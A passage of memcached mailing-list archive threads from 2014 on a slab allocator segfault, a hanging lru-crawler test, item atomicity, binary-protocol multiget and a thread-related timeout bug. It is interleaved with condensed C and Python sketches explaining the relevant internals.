https://groups.google.com/d/optout.
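The reason presizing helps, for reference: the hash table only expands at runtime once the item count outgrows the current table, so starting it large enough takes expansion (and any bug hiding in it) out of the picture entirely. A condensed sketch of the trigger in assoc.c (details vary by version):

/* Condensed sketch of the expansion trigger in assoc.c (details vary by
 * version). hashpower is log2 of the bucket count; starting it high enough
 * with -o hashpower=nn means this branch is never taken at runtime. */
#define hashsize(n) ((uint64_t)1 << (n))

int assoc_insert(item *it, const uint32_t hv) {
    /* ... item is linked into its bucket here ... */
    hash_items++;
    if (!expanding && hash_items > (hashsize(hashpower) * 3) / 2) {
        assoc_start_expand();    /* wake the maintenance thread to migrate
                                    buckets into a table twice the size */
    }
    return 1;
}

As suggested above, nn is taken from the hashpower a long-running server reports in stats (26 in this thread), so the table starts at its steady-state size and never needs to grow.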
Re: slabclass_t.slots
Yes this is fixed in .17. 1.4.20 is the recommended version. The corruption isn't in this function, it's outside of it: https://github.com/memcached/memcached/pull/67 On Wed, 4 Jun 2014, Denis Samoylov wrote: hi, We got a segfault today (stack is below if interesting, we use 1.4.15 and yes i saw Dormando comment about some fixes in .17 but I cannot trace any fix related). My question is actually slightly different - i do grep and i do not see where we initialize slabclass_t-slots. It is set to 0(zero) in slabs_init (by memset). And also I see 8 usages across the file slabs.c including one declaration and one assert (that will cause segfault :) ). in do_slabs_alloc, i immediately see code: it = (item *)p-slots; p-slots = it-next; which assumes that p-slots contains something. But i do not see where slots gets value. I definitely miss something simple. Pls point this field initialization code. (all other usages in free and rebalance that we do not use and i assume are used after something is allocated :) ) Thank you! segfault call stack: #0 do_slabs_alloc (size=853, id=11) at slabs.c:241 #1 slabs_alloc (size=853, id=11) at slabs.c:404 #2 0x0040edc4 in do_item_alloc ( key=0x7f256713e4d4 d_1_v1422c8a1df8a89589777042ac1257ea35|folder_by_id.2041369764.children, nkey=71, flags=value optimized out, exptime=1049722, nbytes=717, cur_hv=2547497763) at items.c:150 #3 0x00409476 in process_update_command (c=0x7f256451ed50, tokens=value optimized out, ntokens=value optimized out, comm=2, handle_cas=value optimized out) at memcached.c:2917 #4 0x004099ab in process_command (c=0x7f256451ed50, command=value optimized out) at memcached.c:3258 #5 0x0040a5a2 in try_read_command (c=0x7f256451ed50) at memcached.c:3504 #6 0x0040b1a8 in drive_machine (fd=value optimized out, which=value optimized out, arg=0x7f256451ed50) at memcached.c:3824 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
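On the "where does slots get a value" part of the question (and restoring the arrows the archive dropped, the quoted lines read: it = (item *)p->slots; p->slots = it->next;): the freelist is filled on the free path, not at init. When do_slabs_newslab carves a fresh page into chunks, each chunk is pushed onto the class's slots list via do_slabs_free, and do_slabs_alloc later pops from it. A condensed sketch of the push side (details vary by version):

/* Condensed sketch of the freelist push in slabs.c (details vary by
 * version). Splitting a new page into chunk-sized items and "freeing"
 * each one is what first gives p->slots a value. */
static void do_slabs_free(void *ptr, const size_t size, unsigned int id) {
    slabclass_t *p = &slabclass[id];
    item *it = (item *)ptr;

    it->it_flags |= ITEM_SLABBED;      /* mark as sitting on the freelist */
    it->prev = 0;
    it->next = p->slots;               /* push onto the head of the list  */
    if (it->next) it->next->prev = it;
    p->slots = it;

    p->sl_curr++;                      /* one more free chunk available   */
}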
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
I may have misread. When you said the server was sitting at 100% CPU, what exactly was using all of the CPU? memcached? perl? On Wed, 28 May 2014, Alex Gemmell wrote: Yep, it's 1.4.20. I followed the instructions here http://memcached.org/downloads and ran wget http://memcached.org/latest;. Just to be sure, this morning I ran wget http://memcached.org/files/memcached-1.4.20.tar.gz; and tried to compile it and got exactly the same problem. I followed your instructions and here's the output (I hope I did this right?) == (gdb) thread apply all bt Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x00416bc9 in item_crawler_thread (arg=value optimized out) at items.c:772 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 6 (Thread 0x752dd700 (LWP 8773)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x0041860d in assoc_maintenance_thread (arg=value optimized out) at assoc.c:251 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 5 (Thread 0x75cde700 (LWP 8772)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x645f30) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 4 (Thread 0x766df700 (LWP 8771)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x642ba0) at thread.c:386 ---Type return to continue, or q return to quit--- #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 3 (Thread 0x770e0700 (LWP 8770)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63f810) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 2 (Thread 0x77ae1700 (LWP 8769)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63c480) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 1 (Thread 0x77b8d700 (LWP 8766)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x00408a25 in main (argc=value optimized out, argv=value optimized out) at memcached.c:5628 == On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote: You're completely sure that's the 1.4.20 source tree? That bug was pretty well fixed... 
If you are definitely testing a 1.4.20 binary, here's the way to grab a trace: start memcached-debug under gdb: gdb ./memcached-debug handle SIGPIPE nostop noprint pass r T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t ... wait until it's been spinning cpu for a few seconds. Then ^C the GDB window and run thread apply all bt .. and send me that info. On Tue, 27 May 2014, Alex Gemmell wrote: Hello Dormando, I am having exactly the same issue but with Memcached 1.4.20. My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 1880MB RAM, single core :( Here are the results of me running prove -v t/lru-crawler.t. It took exactly 10m 15s to run before it timed out. I watched htop while it was running and the single CPU sat at 100% (which is to be expected I guess) but the total server memory barely changed and never rose above 330MB. = prove -v t/lru-crawler.t t/lru-crawler.t .. 1..189 ok 1 ok 2 - stored key ok 3 - stored key ok 4 - stored key ok 5 - stored key
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
Can you try this patch? https://github.com/dormando/memcached/commit/724bfb34484347963a27051fed2b4312e189ace3 Either apply it yourself, or just download the raw file: https://raw.githubusercontent.com/dormando/memcached/724bfb34484347963a27051fed2b4312e189ace3/t/lru-crawler.t On Wed, 28 May 2014, Alex Gemmell wrote: Perl mostly. Screenshot - https://cloudup.com/c-osDM4rjYU On Wednesday, 28 May 2014 11:16:22 UTC-7, Dormando wrote: I may have misread. When you said the server was sitting at 100% CPU, what exactly was using all of the CPU? memcached? perl? On Wed, 28 May 2014, Alex Gemmell wrote: Yep, it's 1.4.20. I followed the instructions here http://memcached.org/downloads and ran wget http://memcached.org/latest;. Just to be sure, this morning I ran wget http://memcached.org/files/memcached-1.4.20.tar.gz; and tried to compile it and got exactly the same problem. I followed your instructions and here's the output (I hope I did this right?) == (gdb) thread apply all bt Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x00416bc9 in item_crawler_thread (arg=value optimized out) at items.c:772 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 6 (Thread 0x752dd700 (LWP 8773)): #0 0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib64/libpthread.so.0 #1 0x0041860d in assoc_maintenance_thread (arg=value optimized out) at assoc.c:251 #2 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #3 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 5 (Thread 0x75cde700 (LWP 8772)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x645f30) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 4 (Thread 0x766df700 (LWP 8771)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x642ba0) at thread.c:386 ---Type return to continue, or q return to quit--- #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 3 (Thread 0x770e0700 (LWP 8770)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63f810) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 2 (Thread 0x77ae1700 (LWP 8769)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63c480) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 1 (Thread 0x77b8d700 (LWP 8766)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? 
() from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x00408a25 in main (argc=value optimized out, argv=value optimized out) at memcached.c:5628 == On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote: You're completely sure that's the 1.4.20 source tree? That bug was pretty well fixed... If you are definitely testing a 1.4.20 binary, here's the way to grab a trace: start memcached-debug under gdb: gdb ./memcached-debug handle SIGPIPE nostop noprint pass r
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
You're completely sure that's the 1.4.20 source tree? That bug was pretty well fixed... If you are definitely testing a 1.4.20 binary, here's the way to grab a trace: start memcached-debug under gdb: gdb ./memcached-debug handle SIGPIPE nostop noprint pass r T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t ... wait until it's been spinning cpu for a few seconds. Then ^C the GDB window and run thread apply all bt .. and send me that info. On Tue, 27 May 2014, Alex Gemmell wrote: Hello Dormando, I am having exactly the same issue but with Memcached 1.4.20. My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 1880MB RAM, single core :( Here are the results of me running prove -v t/lru-crawler.t. It took exactly 10m 15s to run before it timed out. I watched htop while it was running and the single CPU sat at 100% (which is to be expected I guess) but the total server memory barely changed and never rose above 330MB. = prove -v t/lru-crawler.t t/lru-crawler.t .. 1..189 ok 1 ok 2 - stored key ok 3 - stored key ok 4 - stored key ok 5 - stored key ok 6 - stored key ok 7 - stored key ok 8 - stored key ok 9 - stored key ok 10 - stored key ok 11 - stored key ok 12 - stored key ok 13 - stored key ok 14 - stored key ok 15 - stored key ok 16 - stored key ok 17 - stored key ok 18 - stored key ok 19 - stored key ok 20 - stored key ok 21 - stored key ok 22 - stored key ok 23 - stored key ok 24 - stored key ok 25 - stored key ok 26 - stored key ok 27 - stored key ok 28 - stored key ok 29 - stored key ok 30 - stored key ok 31 - stored key ok 32 - stored key ok 33 - stored key ok 34 - stored key ok 35 - stored key ok 36 - stored key ok 37 - stored key ok 38 - stored key ok 39 - stored key ok 40 - stored key ok 41 - stored key ok 42 - stored key ok 43 - stored key ok 44 - stored key ok 45 - stored key ok 46 - stored key ok 47 - stored key ok 48 - stored key ok 49 - stored key ok 50 - stored key ok 51 - stored key ok 52 - stored key ok 53 - stored key ok 54 - stored key ok 55 - stored key ok 56 - stored key ok 57 - stored key ok 58 - stored key ok 59 - stored key ok 60 - stored key ok 61 - stored key ok 62 - stored key ok 63 - stored key ok 64 - stored key ok 65 - stored key ok 66 - stored key ok 67 - stored key ok 68 - stored key ok 69 - stored key ok 70 - stored key ok 71 - stored key ok 72 - stored key ok 73 - stored key ok 74 - stored key ok 75 - stored key ok 76 - stored key ok 77 - stored key ok 78 - stored key ok 79 - stored key ok 80 - stored key ok 81 - stored key ok 82 - stored key ok 83 - stored key ok 84 - stored key ok 85 - stored key ok 86 - stored key ok 87 - stored key ok 88 - stored key ok 89 - stored key ok 90 - stored key ok 91 - stored key ok 92 - slab1 has 90 used chunks ok 93 - enabled lru crawler ok 94 ok 95 - kicked lru crawler Timeout.. killing the process Failed 94/189 subtests Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 95 Failed: 0) Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 95. Files=1, Tests=95, 600 wallclock secs ( 0.09 usr 0.01 sys + 352.24 cusr 61.28 csys = 413.62 CPU) Result: FAIL = Any ideas? On Thursday, 1 May 2014 18:28:57 UTC-7, Dormando wrote: What's the output of: $ prove -v t/lru-crawler.t How long are the tests taking to run? This has definitely been tested on ubuntu 12.04 (which is what I assume you meant?), but not something with so little RAM. 
On Thu, 1 May 2014, Wilfred Khalik wrote: Hi guys, I get the below failure error when I run the make test command: Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by the way on Linux 12.0.4.4 LTS. Slab Stats 64 Thread stats 200 Global stats 208 Settings 124 Item (no cas) 32 Item (cas) 40 Libevent thread 100 Connection 340 libevent thread cumulative 13100 Thread stats cumulative 13000 ./testapp 1..48 ok 1 - cache_create ok 2 - cache_constructor ok 3 - cache_constructor_fail ok 4 - cache_destructor ok 5 - cache_reuse ok 6 - cache_redzone ok 7 - issue_161 ok 8 - strtol ok 9 - strtoll ok 10 - strtoul ok 11 - strtoull ok 12 - issue_44 ok 13 - vperror ok 14 - issue_101 ok 15 - start_server ok 16 - issue_92 ok 17 - issue_102 ok 18 - binary_noop ok 19 - binary_quit ok 20 - binary_quitq ok 21 - binary_set ok 22 - binary_setq ok 23 - binary_add ok 24 - binary_addq ok 25 - binary_replace ok 26 - binary_replaceq ok 27
Re: Memcached read/write consistency
memcached's operations are all atomic. Always have been, always will be, barring bugs. Wouldn't be much useful to anyone if you could have a get come back with half a set... I answer this question a lot and it's pretty bizarre that people think it's how it works. Internally, items are generally immutable (except in one case). If you set a new object in place of an old one, new memory is assigned, the old one is removed from the hash table, and the new one put into it. The old one sticks around so long as anyone is still reading from it, then it is garbage collected (via refcounts). Reads are always consistent and writes don't clobber each other. That would be *insane*. The only exception is incr/decr, which will rewrite the existing item if nobody else is accessing it at the time. If it is being accessed, it allocates new memory as normal. I wonder if I should bump this answer higher up on the wiki somewhere? It's kind of a silly question but it does keep getting asked... On Mon, 12 May 2014, Ezekiel Victor wrote: OK I just noticed that Membase is now Couchbase, but the point remains. Also one of the things we talked about is if the server dies in the middle of a write, what level of protection do you have for the data that would have been written? I guess this discussion would be more about Couchbase at this point. On Monday, May 12, 2014 2:33:29 PM UTC-7, Ezekiel Victor wrote: A coworker and I were having a discussion about whether to use MySQL or memcached for a key-value store. My view is that memcached is designed to be exactly that, and if we desire persistence we can use Membase. He alleged that memcached lacks read/write consistency, such that you can end up reading a half-value if you were to read in the middle of a write. Is this true? I have used memcached under many thousands of reads/writes per second on a high traffic site and never ran into any such problem. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
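The set-swaps-in-a-whole-new-item behaviour described above corresponds to item replace plus refcount-based reclamation. A condensed sketch (not the literal source) of why a reader can never observe half a value:

/* Simplified sketch of why a get can never see half a set: a set builds a
 * complete new item first, then swaps it into the hash table; the old item
 * is destroyed only once the last reader drops its reference.
 * (Condensed; not the literal memcached source.) */
int do_item_replace(item *old_it, item *new_it, const uint32_t hv) {
    do_item_unlink(old_it, hv);      /* old value no longer findable; any
                                        in-flight readers still hold a
                                        refcount on it and read it intact */
    return do_item_link(new_it, hv); /* new, fully written value becomes
                                        visible via the hash table swap   */
}

void do_item_remove(item *it) {
    /* called whenever a reader or the hash table drops its reference */
    if (refcount_decr(&it->refcount) == 0) {
        item_free(it);               /* memory is recycled only after the
                                        last concurrent reader is done    */
    }
}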
1.4.20 released
Fixes a hang regression seen in .18 and .19. Does not affect .17 or older. No other changes.
Re: Multi-get implementation in binary protocol
Unfortunately binprot isn't that much faster processing wise... what it does give you is a bunch of safe features (batching set's, mixing sets/gets and the like). You *can* reduce the packet load on the server a bit by ensuring your client is actually batching the binary multiget packets together, then it's only the server increasing the packet load... On Fri, 9 May 2014, Byung-chul Hong wrote: Hello, Ryan, dormando, Thanks a lot for the clear explanation and the comments. I'm trying to find out how many requests I can batch as a muli-get within the allowed latency. I think multi-get has many advantages, the only penalty is the longer latency as pointed out in the above answer. But, the longer latency may not be a real issue unless it exceeds some threshold that the end users can notice. So, now I'm trying to use multi-get as much as possible. Actually, I have thought that Binary protocol would be always better than ascii protocol since binary protocol can reduce the burden of parsing in the Server side, but it seems that I need to test both cases. Thanks again for the comments, and I will share the result if I get some interesting or useful data. Byungchul. 2014-05-08 9:30 GMT+09:00 dormando dorma...@rydia.net: Hello, For now, I'm trying to evaluate the performance of memcached server by using several client workloads. I have a question about multi-get implementation in binary protocol. As I know, in ascii protocol, we can send multiple keys in a single request packet to implement multi-get. But, in a binary protocol, it seems that we should send multiple request packets (one request packet per key) to implement multi-get. Even though we send multiple getQ, then sends get for the last key, we only can save the number of response packets only for cache miss. If I understand correctly, multi-get in binary protocol cannot reduce the number of request packets, and it also cannot reduce the number of response packets if hit-ratio is very high (like 99% get hit). If the performance bottleneck is on the network side not on the CPU, I think reducing the number of packets is still very important, but I don't understand why the binary protocol doesn't care about this. I missed something? you're right, it sucks. I was never happy with it, but haven't had time to add adjustments to the protocol for this. To note, with .19 some inefficiencies with the protocol were lifted, and most network cards are fast enough for most situations, even if it's one packet per response (and for large enough responses they split into multiple packets, anyway). The reason why this was done is for latency and streaming of responses: - In ascii multiget, I can send 10,000 keys, then I'm forced to wait for the server to look up all of the keys before sending its responses, this isn't typically very high but there's some latency to it. - In binary multiget, the responses are sent back as it receives them from the network more or less. This reduces the latency to when you start seeing responses, regardless of how large your multiget is. this is useful if you have a kind of client which can start processing responses in a streaming fashion. This potentially reduces the total time to render your response since you can keep the CPU busy unmarshalling responses instead of sleeping. However, it should have some tunables: One where it at least does one write per complete packet (TCP_CORK'ed, or similar), and one where it buffers up to some size. 
In my tests I can get ascii multiget up to 16.2 million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and is spending all of its time calling sendmsg(). Most people need far, far less than that, so the binprot as is should be okay though. The code isn't too friendly to this and there're other higher priority things I'd like to get done sooner. The relatively few number of people who do 500,000+ requests per second in binprot (they're almost always ascii at that scale) is the other reason. -- --- You received this message because you are subscribed to a topic in the Google Groups memcached group. To unsubscribe from this topic, visit https://groups.google.com/d/topic/memcached/QwjEftFhtCY/unsubscribe. To unsubscribe from this group and all its topics, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from
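"Batching the binary multiget packets together" on the client side means packing all the quiet GETKQ requests plus a terminating NOOP into one buffer and issuing a single write, rather than one syscall and packet per key. A minimal sketch against the documented binary protocol header layout (the helper names and buffer handling here are illustrative only):

/* Minimal sketch of batching a binary-protocol multiget: N quiet GETKQ
 * requests followed by one NOOP, packed into a single buffer and sent with
 * one write(). Header layout follows the documented binary protocol;
 * helpers and buffer handling are illustrative only. */
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>   /* htons, htonl */

#define OP_GETKQ 0x0d
#define OP_NOOP  0x0a

static size_t pack_req(uint8_t *buf, uint8_t opcode,
                       const char *key, uint16_t keylen) {
    uint16_t klen_n = htons(keylen);
    uint32_t blen_n = htonl(keylen);     /* no extras, so body == key   */
    memset(buf, 0, 24);
    buf[0] = 0x80;                       /* request magic               */
    buf[1] = opcode;
    memcpy(buf + 2, &klen_n, 2);         /* key length                  */
    memcpy(buf + 8, &blen_n, 4);         /* total body length           */
    memcpy(buf + 24, key, keylen);
    return 24 + keylen;
}

size_t pack_multiget(uint8_t *buf, const char **keys, int nkeys) {
    size_t off = 0;
    for (int i = 0; i < nkeys; i++)
        off += pack_req(buf + off, OP_GETKQ, keys[i],
                        (uint16_t)strlen(keys[i]));
    off += pack_req(buf + off, OP_NOOP, "", 0);  /* marks end of the batch;
                                                    quiet misses send nothing */
    return off;   /* write(fd, buf, off) once, then read responses */
}

The misses stay silent and the NOOP response tells the client the batch is done, which is the per-miss packet saving described earlier in the thread; each hit still comes back as its own response, which is the part the server-side buffering tunables discussed above would address.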
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
Can you give me a list (privately, if need be) of a few things: - The exact OS your server is running (centos/redhat release/etc) - The exact kernel version (and where it came from? centos/rh proper or a 3rd party repo?) - Full list of your 3rd party repos, since I know you had some random french thing in there. - Full list of packages installed from 3rd party repos. It is extremely important that all of the software matches. - Hardware details: - Network card(s), speeds - CPU type, number of cores (hyperthreading?) - Amount of RAM - Is this a hardware machine, or a VM somewhere? If a VM, what provider? - memcached stats snapshots again, from your machine after it's been running a while: - stats, stats slabs, stats items, stats settings, stats conns. ^ That's five commands, don't forget any. It's too difficult to try to debug the issue when you hit it. usually when I'm at a gdb console I'm issuing a command every second or two, but it takes us 10 minutes to get through 3-4 commands. It'd be nice if I could attempt to reproduce it here. I went digging more and there're some dup() bugs with epoll, except your libevent is new enough to have those patched.. plus we're not using dup() in such a way to cause the bug. There was also an EPOLL_CTL_MOD race condition in the kernel, but so far as I can tell even with libevent 2.x libevent's not using that feature for us. The issue does smell like the bug that happens with dup()'s - the events keep happening and the fd sits half closed, but again we're never closing those sockets. I can also make a branch with the new dup() calls explicitly removed, but this continues to be obnoxious multi-week-long debugging. I'm convinced that the code in memcached is correct and the bug exists outside of it (libevent or the kernel). There's simply no way for it to hit that code path without closing the socket, and doubly so: epoll automatically delete's an event when the socket is closed. We delete it then close it, and it still comes back. It's not possible a connection ends up in the wrong thread, since both connection initialization and close happens local to a thread. We would need to have a new connection come in with a duplicated fd. If that happens, nothing on your machine would work. thanks. On Thu, 8 May 2014, notificati...@commando.io wrote: I am just speculating, and by no means have any idea what I am really talking about here. :) With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. Increasing from 2 threads to 4 does not generate any more traffic or requests to memcached. Thus I am speculating perhaps it is a race-condition or some sort, only hitting with 2 threads. Why do you say it will be less likely to happen with 2 threads than 4? On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote: That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notifi...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... 
to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote
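For the five stats snapshots requested above (stats, stats slabs, stats items, stats settings, stats conns), a minimal sketch that captures them all in one pass over the plain text protocol so none get forgotten; the host, port and the script itself are assumptions, not something from the original thread:

# Minimal sketch: capture the five stats snapshots requested above in one pass.
# Host/port are assumptions; adjust for the real deployment.
import socket

HOST, PORT = "127.0.0.1", 11211
COMMANDS = ["stats", "stats slabs", "stats items", "stats settings", "stats conns"]

def run_stats(cmd, host=HOST, port=PORT):
    """Send one stats command over the text protocol and return its lines."""
    s = socket.create_connection((host, port), timeout=5)
    s.sendall((cmd + "\r\n").encode())
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = s.recv(4096)
        if not chunk:
            break
        buf += chunk
    s.close()
    return buf.decode(errors="replace").splitlines()

if __name__ == "__main__":
    for cmd in COMMANDS:
        print("===", cmd, "===")
        for line in run_stats(cmd):
            print(line)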
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
I am just speculating, and by no means have any idea what I am really talking about here. :) With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. Increasing from 2 threads to 4 does not generate any more traffic or requests to memcached. Thus I am speculating perhaps it is a race-condition or some sort, only hitting with 2 threads. Doesn't tell me anything useful, since I'm already looking for potential races and don't see any possibility outside of libevent. Why do you say it will be less likely to happen with 2 threads than 4? Nature of race conditions: the more threads you have running the more likely you are to hit them, sometimes on order of magnitudes. It doesn't really change the fact that this has worked for many years and the code *barely* changed recently. I just don't see it. On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote: That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notifi...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't 